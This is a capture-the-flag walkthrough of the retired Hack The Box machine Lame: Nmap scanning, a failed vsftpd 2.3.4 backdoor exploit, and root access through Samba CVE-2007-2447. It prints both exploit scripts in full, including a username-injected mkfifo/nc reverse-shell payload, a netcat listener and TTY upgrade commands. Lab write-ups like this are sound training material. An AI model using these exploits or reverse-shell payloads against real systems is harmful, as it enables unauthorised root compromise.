This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

From today onwards, I will regularly publish write-ups of retired Hack The Box machines. It is Lame’s turn, an Easy machine where we gain root access by exploiting the Samba vulnerability CVE-2007-2447.

Reconnaissance

Port Reconnaissance

The first step is to identify the open ports on the target machine using Nmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
cat Puertos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: Puertos
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap --open -p- -T5 -Pn -oG Puertos 10.10.10.3
2 │ Host: 10.10.10.3 () Status: Up
3 │ Host: 10.10.10.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, 3632/open/tcp//distccd/// Ignored State: filtered (65530)
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
❯ Reconocimiento Puertos

{*} Extrayendo puertos...

La direccion ip es: 10.10.10.3
Los puertos abiertos son: 21,22,139,445,3632

Los puertos han sido copiados al portapapeles

Once we know which ports are open on the victim, we run some basic reconnaissance scripts.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
nmap -sCV -O -p 21,22,139,445,3632 -oN Objetivos 10.10.10.3
Nmap scan report for 10.10.10.3
Host is up (0.054s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.16.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|remote management|printer|general purpose|power-device
Running (JUST GUESSING): Linux 2.4.X|2.6.X (92%), Dell embedded (92%), Linksys embedded (92%), Tranzeo embedded (92%), Xerox embedded (92%), Dell iDRAC 6 (92%), Raritan embedded (92%)
OS CPE: cpe:/o:linux:linux_kernel:2.4.36 cpe:/h:dell:remote_access_card:6 cpe:/h:linksys:wet54gs5 cpe:/h:tranzeo:tr-cpq-19f cpe:/h:xerox:workcentre_pro_265 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:2.6 cpe:/o:dell:idrac6_firmware
Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.6.8 - 2.6.30 (92%), Dell iDRAC 6 remote access controller (Linux 2.6) (92%), Raritan Dominion PX DPXR20-20L power control unit (92%), LifeSize video conferencing system (Linux 2.4.21) (92%), Linux 2.6.23 (91%), OpenWrt White Russian 0.9 (Linux 2.4.30) (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
|_ FQDN: lame.hackthebox.gr
|_clock-skew: mean: 2h00m21s, deviation: 2h49m45s, median: 19s

Potential Paths

FTP

We can see that FTP is accessible with the credentials anonymous:anonymous, so let us see what we can find.

1
2
3
4
5
6
7
8
9
10
11
12
13
ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:void4m0n): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||21114|).
150 Here comes the directory listing.
226 Directory send OK.

We did not find anything useful. Knowing that the FTP server is running vsFTPd 2.3.4, we can check whether that version is vulnerable.

1
2
3
4
5
6
7
searchsploit vsFTPd 2.3.4
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

It looks as though we may be able to compromise the victim, so we inspect the exploit.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# Exploit Title: Vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: Herculesrd
# Software Link: Http://Www.Linuxfromscratch.Org/~Thomasp/Blfs-Book-Xsl/Server/Vsftpd.Html
# Version: Vsftpd 2.3.4
# Tested On: Debian
# Cve : Cve-2011-2523

#!/usr/bin/python3

from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
# Handle Any Cleanup Here
print(' [+]Exiting...')
exit(0)

signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()%

We run the script as python3 49757.py 10.10.10.3, but the backdoor does not connect. We need to find another potential attack vector.

Samba

Looking at the Samba version reported by Nmap, we have 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP). We search for a vulnerability affecting this version.

1
2
3
4
5
6
searchsploit Samba 3.0.20
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

It appears to be vulnerable. A little research reveals that the relevant CVE is CVE-2007-2447. INCIBE has a report on the vulnerability if you would like to examine it.
Because we do not want to rely on Metasploit, we search GitHub for a script that exploits this vulnerability.

This GitHub repository contains a Python script that can establish a reverse shell.
The author explains the vulnerability on their blog.

Usermap_script Script

We inspect the script’s contents:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: usermap_script.py
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1#!/usr/bin/python
2# -*- coding: utf-8 -*-
3
4# From : https://github.com/amriunix/cve-2007-2447
5# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/
6
7import sys
8from smb.SMBConnection import SMBConnection
9
10def exploit(rhost, rport, lhost, lport):
11 │ payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
12 │ username = "/=`nohup " + payload + "`"
13 │ conn = SMBConnection(username, "", "", "")
14try:
15 │ conn.connect(rhost, int(rport), timeout=1)
16except:
17print("[+] Payload was sent - check netcat !")
18
19if __name__ == '__main__':
20print("[*] CVE-2007-2447 - Samba usermap script")
21if len(sys.argv) != 5:
22print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
23else:
24print("[+] Connecting !")
25 │ rhost = sys.argv[1]
26 │ rport = sys.argv[2]
27 │ lhost = sys.argv[3]
28 │ lport = sys.argv[4]
29 │ exploit(rhost, rport, lhost, lport)
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

The script requires the following parameters.

1
2
3
4
5
* `RHOST` -- The target address
* `RPORT` -- The target port (TCP : 445)
* `LHOST` -- The listen address
* `LPORT` -- The listen port

Before running the script, we start a netcat listener on the port matching LPORT, which in our case is 1234.

1
2
❯ nc -lvnp 1234
listening on [any] 1234 ...

We run the script with the required parameters.

1
2
3
4
5
6
[-] usage: python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>

python3 usermap_script.py 10.10.10.3 445 10.10.16.3 1234
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !

As the script suggests, we check whether the reverse shell connected.

1
2
3
4
5
nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.3] 58132
whoami
root

Spawning a TTY

Perfect! We are root and could already retrieve user.txt | root.txt, but as usual, we spawn a fully interactive TTY so that we can work more comfortably.

1
2
3
4
5
6
7
script /dev/null -c bash
root@lame:/# ^Z
[1] + 6995 suspended nc -lvnp 1234
❯ stty raw -echo; fg
[1] + 6995 continued nc -lvnp 1234
*************************En este momento debemos poner [reset xterm] no se nos mostrará ningún texto en pantalla, presionamos enter
root@lame:/#

We can now work properly with Ctrl+C, command history, arrow keys and so on.

Flags

We retrieve the flags from their respective directories.

User.Txt

1
2
root@lame:/home/makis# cat user.txt 
2d31xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Root.Txt

1
2
root@lame:/root# cat root.txt 
cb70xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Knowledge Gained

The LAME machine teaches us the following:

  • Port reconnaissance with Nmap.
  • Vulnerability research.
  • Exploiting a vulnerability without Metasploit.
  • Spawning a fully interactive TTY.

Credits and References

Machine author: ch4p. Thank you for creating Lame and contributing it to the community.